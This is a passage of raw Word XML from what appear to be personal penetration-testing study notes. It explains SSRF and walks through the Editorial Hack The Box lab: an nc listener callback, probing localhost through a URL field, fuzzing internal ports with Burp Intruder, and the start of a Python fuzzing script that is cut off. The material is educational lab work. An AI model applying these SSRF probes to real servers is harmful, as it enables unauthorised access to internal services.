      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from Tier 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C8B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C8C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another box where SSTI is used is the </w:t>
      </w:r>
      <w:hyperlink r:id="rId945">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Djinn3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C8D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C8E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C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90">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C91">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4dv39t2dzaj8" w:id="390"/>
      <w:bookmarkEnd w:id="390"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C92">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C93">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Server-Side Request Forgery (SSRF)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a type of security vulnerability that allows an attacker to make the server perform unauthorized requests on their behalf. These requests are often made to internal systems or external resources that the attacker might not directly have access to. The vulnerability occurs when the server processes user-supplied input to craft and execute requests without sufficient validation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C94">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_zxctn5x38rk" w:id="391"/>
      <w:bookmarkEnd w:id="391"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How SSRF Works</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1370"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A web application takes user input (e.g., a URL or file path) to fetch a resource (e.g., downloading an image or performing an API call).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1370"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The server does not properly validate the user input.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1370"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">An attacker manipulates the input to craft a malicious request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1370"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The server executes the malicious request, potentially accessing sensitive internal or external resources.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C99">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1320"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fetching Internal Resources:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1320"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://example.com/resource?url=http://localhost:8080/admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1320"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The server fetches an internal admin page.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C9D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C9E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Editorial HTB was my introduction to SSRF. I didn't do the box but I read through the walkthrough. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is what they did in the Editorial HTB:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C9F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CA0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to check for SSRF:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="674"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There was an input form, and one of the options was a URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="674"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try and get a connection to our own IP. So, first set up a listener on port 5555</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CA3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="674"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lnvp 5555</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="674"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, put in the URL of our own IP and port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CA5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="674"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://10.10.16.7:5555</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CA6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="674"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check to see if we get a connection. If we do, then it might be vulnerable to SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CA7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CA8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit SSRF:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="897"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once we think it's vulnerable to SSRF, that means we can try looking at hidden stuff on the local port (127.0.0.1) that we might not see on the machine's external IP (ex. 10.10.11.20). Even though 127.0.0.1 and 10.10.11.20 might be referring to the same machine from the POV of the target machine, they are different since 127.0.0.1 does not involve the network card or external traffic. It's completely local. While 10.10.11.20 is external. So, certain ports may be open only locally and configured to not be open outside. So, we can start looking at those ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CAA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="897"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We will start by testing port 80 , which is commonly used for HTTP services. By sending a request to http://127.0.0.1:80 (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">intercept in Burp Suite and send to repeater</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), we can check if there is a service running on that port, but this only returns a JPEG file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CAB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="897"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we look at other potentially open ports that are hosting services internally. To do this, we'll use this </w:t>
      </w:r>
      <w:hyperlink r:id="rId946">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">wordlist </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">that contains common HTTP ports along with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Suite Intruder.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> This will automate the process of sending requests to each port listed in the wordlist, allowing us to fuzz through multiple ports quickly and identify which ones might be running web services. To do this in Burp Intruder, under the Positions tab, we highlight the port section in our request and then click on Add § .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CAC">
      <w:pPr>
        <w:ind w:left="-1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7902264" cy="2444130"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="300" name="image303.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image303.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId947"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7902264" cy="2444130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="897"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, in Burp Intruder options, we can load the Common HTTP Ports wordlist into our payload in Burp Suite . We click on the Payloads tab, and under the Payload Settings , we click on Load and then select our wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="897"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we also noticed that some responses returned with a .jpeg file extension during our initial test, we can filter the results by grepping for .jpeg . To do this, we navigate to the Settings tab, select Grep - Match , and add the .jpeg extensions. This helps us narrow down our results and focus only on those that return unique responses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="897"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upon finishing, we see that all responses contain a .jpeg file extension. We can now write a Python script to fuzz all open ports (1-65535) and filter out any responses that do not contain a .jpeg extension, as using the free version of Burp Intruder would be slow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CB0">
      <w:pP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2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77777"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">#!/usr/bin/python3</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">import</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> requests</w:t>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">with</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> open(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dd8888"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"a"</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'wb'</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as</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> f:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    f.write(</w:t>
            </w:r>
